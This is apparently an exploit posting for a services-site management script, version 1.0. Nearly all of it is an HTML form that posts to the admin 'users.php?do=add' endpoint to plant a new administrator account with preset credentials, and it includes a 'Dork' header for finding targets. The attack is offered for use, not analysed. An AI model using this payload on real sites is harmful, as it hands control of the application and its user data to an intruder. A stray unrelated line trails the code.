:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: Exploit Title : Advneced Management For Services Sites Remote add admin exploit Author: alnjm33 Software Link: http://am4ss.com/am4ss.zip Tested on: Version 1.0 My home : Sec-war.com :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ==========================================Dork========================================== find it ================================Exploit============================================= <html dir="rtl"> <head> <meta http-equiv="Content-Language" content="en-us"> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>sec-war.com</title> </head> <body text="#00FF00" bgcolor="#000000"> <form method="post" action="http://localhost/am4ss//admincp//users.php?do=add"> <p align="center"><b><br> login with </b></p> <p align="center"><a href="mailto:sec-war@demo.net"><font color="#C0C0C0"> sec-war@demo.net</font></a></p> <p align="center"><b>pass</b></p> <p align="center">123456</p> <table class="tborder" id="table32" style="BORDER-COLLAPSE: separate" cellSpacing="0" cellPadding="4" width="90%" align="center" border="0"> <colgroup span="2"> <col style="WIDTH: 45%"><col style="WIDTH: 55%"> </colgroup> <thead> <tr> <td class="tcat" align="middle" colSpan="2" height="27"><b>add new admin </b> </td> </tr> </thead> <tr vAlign="top"> <td class="optiontitle" colSpan="2"> <p align="center"> </td> </tr> <tbody id="tbody_bbtitle"> <tr vAlign="top"> <td class="alt1" width="45%"> <div class="smallfont"> <p align="center">Name*</div> </td> <td class="alt1" width="52%"> <p align="center"> <input class="bginput" dir="rtl" tabIndex="1" size="40" name="userfullname" value="Security War"> </td> </tr> <tr vAlign="top"> <td class="optiontitle" colSpan="2"> <div> <p align="center"> </div> </td> </tr> <tbody id="tbody_bbtitle"> <tr vAlign="top"> <td class="alt1" width="45%"> <p align="center">PASS must me*</td> <td class="alt1" width="52%"> <p align="center"> <input class="bginput" dir="rtl" tabIndex="1" type="password" size="40" name="password" value="123456"><span lang="fr"> </span></td> </tr> <tr vAlign="top"> <td class="optiontitle" colSpan="2"> <div> <p align="center"> </div> </td> </tr> <tbody id="tbody_bbtitle"> <tr vAlign="top"> <td class="alt1" width="45%"> <div class="smallfont"> <p align="center">username email *</div> </td> <td class="alt1" width="52%"> <p align="center"> <input class="bginput" dir="rtl" tabIndex="1" size="40" name="useremail" value="sec-war@demo.net"><span lang="fr"> </span></td> </tr> <tr vAlign="top"> <td class="optiontitle" colSpan="2"> </td> </tr> <tbody id="tbody_bbtitle"> <tr vAlign="top"> <td class="alt1" width="45%"> <div class="smallfont"> <p align="center"><font face="Tahoma">forget it i made it egypt</font></div> </td> <td class="alt1" width="52%"> <p align="center"> <select class="Edits" style="width: 181; height: 53" name="country" size="99" tabindex="10"> <option value="ET"></option> <option>-- --</option> <option value="MA"> </option> <option value="EG" selected></option> </select> <span lang="fr"></span></td> </tr> <tr vAlign="top"> <td class="optiontitle" colSpan="2"> <div> <p align="center"> </div> </td> </tr> <tbody id="tbody_bbtitle"> <tbody id="tbody_bbtitle"> <tr vAlign="top"> <td class="alt1" width="45%"> <div class="smallfont"> <p align="center"><font face="Tahoma">forget it i made it admin </font></div> </td> <td class="alt1" width="52%"> <p align="center"> <select name="usergroup" size="1" tabindex="1"> <option value="3"></option> <option value="2"></option> <option value="1"></option> </select> <span lang="fr"></span></td> </tr> <tbody id="tbody_bbtitle"> <tr> <td class="tfoot" align="middle" colSpan="2"> <input class="button" id="submit" type="submit" value="ok add"> </td> </tr> </table> <input type="hidden" name="do" value="save"> </form> </body> </html>
体验盒子
